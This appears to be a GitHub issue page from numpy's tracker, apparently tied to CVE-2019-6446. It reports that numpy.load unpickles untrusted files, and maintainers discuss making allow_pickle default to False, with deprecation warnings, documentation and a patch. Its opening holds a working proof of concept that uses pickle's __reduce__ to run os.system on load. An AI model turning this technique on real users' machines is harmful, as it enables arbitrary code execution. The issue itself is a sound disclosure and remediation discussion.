numpy load function with evil data will cause command execution

Created on 16 Jan 2019  ·  32Comments  ·  Source: numpy/numpy

numpy load function with evil data will cause command execution,if attack share evil data on internet,
when user load it , it will cause command execution.

Reproducing code example:

import numpy
from numpy import __version__
print __version__
import os
import  pickle
class Test(object):
    def __init__(self):
        self.a = 1

    def __reduce__(self):
        return (os.system,('ls',))
tmpdaa = Test()
with open("a-file.pickle",'wb') as f:
    pickle.dump(tmpdaa,f)
numpy.load('a-file.pickle')

Numpy/Python version information:

1.14.6

00 - Bug 15 - Discussion Documentation good first issue

Most helpful comment

I am still in favor of a warning when loading object data, it can be a bit "too late", but makes for a much less noisy transition. We could add a warning when saving (just a permanent warning). There is an open PRs which I hope transform into something more like that. If you want to spend time on it, we are generally happy about PRs.
It seems to me that it is conversion towards starting a deprecation cycle soon in any case, and I think that will happen (but it will be sooner if someone picks it up ;)). There may be a small chance of a request to delay, but I doubt it, and it is hard to know without trying.

All 32 comments

the version <=1.16.0 , worked

Yes, which is why np.load(allow_pickle=True) was added, now I guess we could make a move to switch over to defaulting to False and give a well readable message " use allow_pickle="True" if you trust this file".

I agree that this would be the better default, so I am open to pushing that deprecation, even if it is unfortunately a bit noisy e.g. for all those scientists just sharing some data in the lab (or just saving/reloading themselves).

So allow_pickle was added in april 2015, so it would seem that is should have existed since numpy 1.10. So I think that move does get more realistic now, since I doubt many using/supporting 1.17 will also still support 1.10 (removing the pain of supporting the kwarg or not supporting it). Although for the moment it seems scipy at least still supports 1.8 in version 1.

it seems it will be last for a long time

I would suggest logging a deprecation warning and giving a date if you want a smooth transition.

@Plazmaz of course, I would go with a VisibleDeprecationWarning, if we want casual users to stop doing it. Then deprecate after one or two releases. The thing is that it is annoying to work around if you have to and the kwarg does not exist in some older versions. Because then you have to do if np.__version__ > ...: use kwarg else do not use kwarg to avoid the warning and support both.

Anyway, I think there is a good chance you can get it into 1.17. So if you feel open a PR, but we may want to ping the mailing list to see if someone complains.

Hi, Fedora numpy RPM maintainer. What's a good way to mitigate this in distro packaging?

I do not know of a nice way. Depending on the concern level, I would be up to adding a warning very soon, so that it is definitely there in 1.17. If someone is extremely concerned, we could discuss backporting it or moving quicker, but that would depend a lot on whether or not downstream depends on it.

I am working on this.

cc @jeanqasaur re: security / vulnerability expertise

Hi, Fedora numpy RPM maintainer. What's a good way to mitigate this in distro packaging?

@limburgher: what does fedora do about the exact same functionality built into Python? It's not clear that this is something that needs mitigating.

While I'm not opposed to changing the default, it seems wrong to declare this a vulnerability. It's working as documented and designed.

Unfortunately the rule is that once a CVE number is assigned, it no longer matters whether there is any bug or not, the distros have to try to do something to prove to their customers that they are Providing Value. Not sure what that would be here, but companies and ops people are always struggling to manage the ongoing flood of vulnerabilities, and the tools they use to do this don't have a lot of room for communicating nuance, so that's the way the pressure goes. We don't have customers though, so we shouldn't necessarily take that into account outselves.

We can tell during save and load whether a particular file uses pickle or not, right? It probably is good to migrate to allow_pickle=False in both cases, with an intermediate period where we issue some kind of deprecation warning exactly in the cases where save or load actually does need to use pickle and allow_pickle wasn't specified.

@eric-wieser The difference from the stdlib pickle is that load/save actually can avoid using pickle in most cases (e.g. simple arrays of primitive types); pickle only gets used in more exotic cases like object arrays or IIRC certain complicated dtypes. This makes it possible for folks who are mostly using the safe case to miss that the unsafe case exists, if they don't read the docs closely enough. And anyway, given that we have both a "safe mode" and an "unsafe mode", it's better for the "safe mode" to be the default. For stdlib pickle OTOH, it's always 100% unsafe 100% of the time so there's no point in worry about defaults.

Honestly, if it's documented, intentional functionality, I can close the BZ in good conscience, especially if safe is the default. I don't know how we handle Python's functionality. I'll look.

From my examination of the spec, I don't think we alter anything from upstream in that regard.

Has the CVE been disputed? That might make the scenario clearer to maintainers.

The CVE appears largely bogus. That numpy.load can execute arbitrary code is well known and documented, and it is necessary for loading serialized Python object arrays. The user can forbid loading object arrays by passing allow_pickle=False to this library function.

It would have been better if the default had been to load object arrays only when explicitly asked, but it is as it is for historical reasons. The transition has been suggested also before, and the discussion above is about how to make it in a way that does not uncontrollably break backward compatibility.

Careless use of numpy.load, similarly as of Python pickling, can however lead to vulnerabilities in downstream applications.

That numpy.load can execute arbitrary code is well known and documented, and it is necessary for loading serialized Python object arrays.

I would rather only say that it is documented. I've been using numpy for a few years, and while I'm not a frequent user of numpy.save/numpy.load it wasn't obvious to me at all that numpy.load suffers from the same vulnerability as pickle does. Of course I didn't know that numpy.load might use pickle under the hood (I only use numpy-native arrays and never gave it a thought, exactly the scenario that @njsmith mentioned).

The fact that pickle is vulnerable is well-known, and its documentation has a big red warning on top saying

Warning: The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

In comparison, the docs of numpy.load seems to mention the whole security aspect as an aside in the description of its allow_pickle keyword:

allow_pickle: _bool, optional_
Allow loading pickled object arrays stored in npy files. Reasons for disallowing pickles include security, as loading pickled data can execute arbitrary code. If pickles are disallowed, loading object arrays will fail. Default: True

I wouldn't hate it if we could put a Big Red Warning into the documentation of numpy.load, at least until allow_pickle=False becomes the default. Until that change is made seeing numpy.load should raise the same red flags in one's mind that pickle.load raises.

Documentation PR welcome for numpy.load

Documentation now has a warning about pickle

Unfortunately the rule is that once a CVE number is assigned, it no longer matters whether there is any bug or not, the distros have to try to do _something_ to prove to their customers that they are Providing Value. Not sure what that would be here, but companies and ops people are always struggling to manage the ongoing flood of vulnerabilities, and the tools they use to do this don't have a lot of room for communicating nuance, so that's the way the pressure goes.

@njsmith it is not so bad: we will make numpy.load default to allow_pickle to False, which is actually not completely stupid idea.

The only risk I see with that is any project that doesn't explicitly set allow_pickle will break.

It's not just end-user projects we have to worry about - I'm worried about downstream libraries providing mylib.load that wrapsnp.load. These will start failing to load object arrays. One of three things will happen with them:

  • They remain abandoned, and will never work on object arrays in the way they used to. Users will find their data is held hostage, and have to downgrade numpy to recover it.
  • They re-release setting allow_pickle=True to resume the old behavior - which is the downstream libraries indicating that they think this isn't an attack vector they care about. This still costs them an incompatible release
  • They will expose allow_pickle=False in their own API, pushing the problem downstream.

My preference would be:

  • Do nothing to np.save. Having a long-running script crash at the end while saving an object array is an awful experience.
  • Change the default in np.load to None. Detect the user not passing in True or False explicitly, and emit a UserWarning explaining the dangers, asking them to choose between security (False) and object array support (True). Default to the status quo after emitting this warning. It's my understanding that the problem here is lack of awareness. Neither choice is correct in all cases, so I don't think we should suddenly change our minds about the default without warning.

@eric-wieser good point about the pain of a script crashing. I would be up for giving a UserWarning by default.

The question is what we want to do in the long run in load. I am not sure I like forcing everyone to use the kwarg (to silence the warning), when the array is safe. Although it does have the merit of no danger of locking someone out of their data... OTOH, if the warning only shows up on "unsafe" load, it may be too late. Right now I think I have a slight preference for making the transition period rather a bit longer.

OTOH, if the warning only shows up on "unsafe" load, it may be too late.

Either:

  • The library/script already exists and is published - anything we do is already too late
  • The library/script is still being developed. The developer should see the warning during local testing on safe file, and should be able to make an informed decision about which behavior they want. For this reason, we should emit the warning even if the array is safe (and probably before loading it, just in case they have the python equivalent of -Werror set).

Yes, I definitely agree for libraries, but I think it may be a bit annoying for the vast number of shorter scripts.

Change the default in np.load to None. Detect the user not passing in True or False explicitly, and emit a UserWarning explaining the dangers, asking them to choose between security (False) and object array support (True). Default to the status quo after emitting this warning. It's my understanding that the problem here is lack of awareness. Neither choice is correct in all cases, so I don't think we should suddenly change our minds about the default without warning.

This sounds super annoying though. Most people (I believe) don't save/load object arrays. And the worst case if someone misses the warning is (eventually) their script crashes when loading, the data is still safe on disk, and they retry with the allow_pickle flag.

Is it beyond the responsibility of numpy to try loading safely first and only shouting in case that fails due to object arrays? That would remove extra work for most (non-objecty) use cases, but I guess that would also reduce visibility of the whole security issue. Then again I think "users should be made very aware" and "users should not be inconvenienced" are a bit contradictory efforts here.

* Change the default in `np.load` to `None`. Detect the user not passing in `True` or `False` explicitly, and emit a `UserWarning` explaining the dangers, asking them to choose between security (`False`) and object array support (`True`). Default to the status quo after emitting this warning. It's my understanding that the problem here is lack of awareness. Neither choice is correct in all cases, so I don't think we should suddenly change our minds about the default without warning.

What about this patch?

* Change the default in `np.load` to `None`. Detect the user not passing in `True` or `False` explicitly, and emit a `UserWarning` explaining the dangers, asking them to choose between security (`False`) and object array support (`True`). Default to the status quo after emitting this warning. It's my understanding that the problem here is lack of awareness. Neither choice is correct in all cases, so I don't think we should suddenly change our minds about the default without warning.

What about this patch:

--- a/numpy/lib/npyio.py
+++ b/numpy/lib/npyio.py
@@ -265,7 +265,7 @@ class NpzFile(object):
         return self.files.__contains__(key)


-def load(file, mmap_mode=None, allow_pickle=True, fix_imports=True,
+def load(file, mmap_mode=None, allow_pickle=None, fix_imports=True,
          encoding='ASCII'):
     """
     Load arrays or pickled objects from ``.npy``, ``.npz`` or pickled files.
@@ -367,6 +367,16 @@ def load(file, mmap_mode=None, allow_pic
     memmap([4, 5, 6])

     """
+
+    if allow_pickle is None:
+        UserWarning("""
+        numpy.load() run without explicit setting allow_pickle option.
+        If you are not completely certain about security of the pickled
+        data, you are strongly encouraged to set allow_pickle to False,
+        otherwise you can set it to True.
+        """)
+        allow_pickle = False
+
     own_fid = False
     if isinstance(file, basestring):
         fid = open(file, "rb")

I am still in favor of a warning when loading object data, it can be a bit "too late", but makes for a much less noisy transition. We could add a warning when saving (just a permanent warning). There is an open PRs which I hope transform into something more like that. If you want to spend time on it, we are generally happy about PRs.
It seems to me that it is conversion towards starting a deprecation cycle soon in any case, and I think that will happen (but it will be sooner if someone picks it up ;)). There may be a small chance of a request to delay, but I doubt it, and it is hard to know without trying.

Could you please close this issue as it is referenced in https://nvd.nist.gov/vuln/detail/CVE-2019-6446 because of which nexus iq still consider it has Vulnerable

thanks @Manjunath07

Was this page helpful?
0 / 5 - 0 ratings